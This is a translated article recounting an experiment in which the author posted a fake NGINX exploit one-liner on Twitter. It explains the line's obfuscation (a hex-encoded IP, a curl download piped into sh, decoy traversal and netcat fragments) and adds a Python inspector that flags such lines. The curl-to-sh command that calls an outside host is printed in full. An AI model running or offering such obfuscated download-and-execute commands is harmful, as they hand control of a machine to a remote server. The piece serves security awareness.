A successful social-engineering experiment with a fake nginx exploit

Translator's note: The author of the original article, published on June 1, decided to run an experiment among information-security enthusiasts. To do this, he prepared a fake exploit for an undisclosed vulnerability in the web server and posted it on his Twitter. His assumption, that he would be exposed immediately by specialists who would see the obvious deception in the code, not only failed to come true... It exceeded all expectations, and in the opposite direction: the tweet received huge support from many people who never looked at what was inside it.


TL;DR: Never pipe a downloaded file into sh or bash under any circumstances. It is a great way to lose control of your computer.

I want to share with you a short story about a comic PoC exploit that was created on May 31st. It appeared promptly in response to news from Alisa Esage Shevchenko, a member of the Zero Day Initiative (ZDI), that information about a vulnerability in NGINX leading to RCE (remote code execution) would soon be disclosed. Since NGINX powers a huge number of websites, the news should have been a bombshell. But because of delays in the "responsible disclosure" process, the details of what had been found were not known; this is standard ZDI practice.

[Image: tweet about the upcoming disclosure of the NGINX vulnerability]

Having just finished work on a new obfuscation technique for curl, I quoted the original tweet and "released a working PoC" consisting of a single line of code that supposedly exploits the discovered vulnerability. Of course, it was complete nonsense. I assumed I would be exposed immediately, and that at best I would get a couple of retweets (oh well).

[Image: tweet with the fake exploit]

However, I could not have imagined what happened next. My Twitter popularity skyrocketed. Surprisingly, at the time of writing (15:00 Moscow time on June 1) few people have realised that this is a fake. Many people retweet it without checking it at all (let alone admiring the pretty ASCII graphics it outputs).

[Image: the ASCII graphics printed by the script. Caption: Just look how beautiful it is!]

While all these loops and colours are nice, it is obvious that people had to run the code on their own machine to see them. Fortunately, browsers work the same way, and combined with the fact that I really did not want to get into legal trouble, the code hosted on my site only made echo calls without trying to install or execute any additional code.

A small digression: netspooky, dnz, I and the other guys from the Thugcrowd team have been playing with various ways of obfuscating curl commands for a while now, because it's cool... and we're geeks. netspooky and dnz found several new techniques that seemed very promising to me. I joined in the fun and tried adding decimal IP conversion to the bag of tricks. It turns out that an IP can also be converted to hexadecimal format. Moreover, curl and most other *NIX tools happily accept hexadecimal IPs! So it was just a matter of building a convincing and safe-looking command line. In the end I settled on this:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Socio-electronic engineering (SEE): more than phishing
</gra_replace_placeholder_never_emitted>

Safety and familiarity were the main ingredients of this experiment. I think they are what made it successful. The command line clearly hinted at safety by mentioning "127.0.0.1" (the well-known localhost). Localhost is perceived as safe, and data sent to it never leaves your computer.

Familiarity was the second key SEE component of the experiment. Since the target audience consisted mainly of people who know the basics of computer security, it was important to craft the code so that its parts looked familiar and recognisable (and therefore safe). Borrowing elements of old exploit concepts and combining them in an unusual way proved very successful.

Below is a detailed breakdown of the one-liner. Everything in this list is purely cosmetic, and none of it is needed for the line to actually work.

So which components are actually required? These: -gsS, -O 0x0238f06a, |sh and the web server itself. The web server contained no malicious instructions; it only drew ASCII graphics using echo commands in a script served as index.html. When the user entered the line with |sh in the middle, index.html was downloaded and executed. Fortunately, the maintainers of the web server had no malicious intent.

  • ../../../%00 - represents a directory traversal;
  • ngx_stream_module.so - the path to a non-existent NGINX module;
  • /bin/sh%00<'protocol:TCP' - we supposedly launch /bin/sh on the target machine and redirect its output to a TCP channel;
  • -O 0x0238f06a#PLToffset - the secret ingredient, decorated with #PLToffset to look like a memory offset somewhere in the PLT;
  • |sh; - the other essential piece. The output had to be redirected into sh/bash so that the code arriving from the "attacking" web server at 0x0238f06a (2.56.240.x) gets executed;
  • nc /dev/tcp/localhost - a dummy in which netcat points at /dev/tcp/localhost so that everything looks safe again. In fact it does nothing and is included in the line purely for beauty.
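As an added example (not code from the post or from Thugcrowd), here is a small Python inspector that does what the people who retweeted without checking did not: it normalises the IP spellings that inet_aton-style parsers such as curl accept (0x0238f06a above decodes to 2.56.240.106, the 2.56.240.x the author mentions) and flags a command whose downloaded output is piped into a shell. The one-liner is embedded as constructed input and the regular expressions are heuristics of my own.

```python
import re
from typing import Optional

def _field(text: str) -> int:
    # inet_aton(3) rules: 0x prefix -> hex, leading 0 -> octal, otherwise decimal
    if text[:2].lower() == "0x":
        return int(text[2:], 16)
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)
    return int(text, 10)

def decode_ip_literal(literal: str) -> Optional[str]:
    """Normalise dotted-quad, shortened dotted, plain decimal and 0x hex IPv4
    spellings to a canonical dotted quad. Returns None for anything else."""
    parts = literal.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_field(p) for p in parts]
    except ValueError:
        return None
    *lead, last = values
    width = 32 - 8 * len(lead)  # the last field fills all remaining bits
    if any(not 0 <= v <= 255 for v in lead) or not 0 <= last < (1 << width):
        return None
    number = last
    for shift, v in zip(range(width, 33, 8), reversed(lead)):
        number |= v << shift
    return ".".join(str((number >> s) & 0xFF) for s in (24, 16, 8, 0))

PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|z|da)?sh\b")
# Heuristic: only non-dotted spellings (0x hex or a long plain decimal) are flagged.
OBFUSCATED_HOST = re.compile(r"(?<![\w.])(?:0x[0-9a-fA-F]{1,8}|\d{8,10})(?![\w.])")

def inspect_command(cmd: str) -> dict:
    """Checks a reviewer wants before pasting a one-liner into a terminal:
    does its output reach a shell, and which hosts hide behind odd IP spellings?"""
    hosts = {}
    for m in OBFUSCATED_HOST.finditer(cmd):
        dotted = decode_ip_literal(m.group(0))
        if dotted:
            hosts[m.group(0)] = dotted
    return {"pipes_to_shell": bool(PIPE_TO_SHELL.search(cmd)), "hidden_hosts": hosts}

# Constructed input: the fake PoC line from the post, used here only for inspection.
FAKE_POC = ("curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?"
            "/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP'"
            " -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost")

if __name__ == "__main__":
    print(inspect_command(FAKE_POC))
```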

This concludes the breakdown of the one-line script and the discussion of its "socio-electronic engineering" aspects (sophisticated phishing).

Web server configuration and countermeasures

Since most of my followers are infosec people / hackers, I decided to make the web server respond a little more harshly to expressions of "interest" on their part, so that the guys would have something to do (and it would be fun to set up). I'm not going to list all the traps here, since the experiment is still ongoing, but here are a few things the server does:

  • Carefully monitors attempts to share the link on certain social networks and substitutes different preview thumbnails to encourage the user to click on it.
  • Redirects Chrome/Mozilla/Safari/etc to the Thugcrowd promotional video instead of showing the shell script.
  • Watches for OBVIOUS signs of intrusion attempts / blatant hacking, and then starts redirecting those requests to NSA servers (ha!).
  • Installs a Trojan, together with a BIOS rootkit, on every computer whose user visits the host from a regular browser (just kidding!).

[Image: a small part of the countermeasures]

In this case my only goal was to learn a few things about Apache, in particular its cool rules for redirecting requests, and I thought: why not?

NGINX exploit (a real one!)

Follow @alisaesage on Twitter and keep an eye on the great work ZDI does in handling real vulnerabilities and exploitation opportunities in NGINX. Their work has always fascinated me, and I am grateful to Alice for her patience with all the mentions and notifications my tweet caused. Fortunately, it also did some good: it helped raise awareness of the NGINX vulnerability, as well as of the problems caused by abusing curl.

Source: www.habr.com
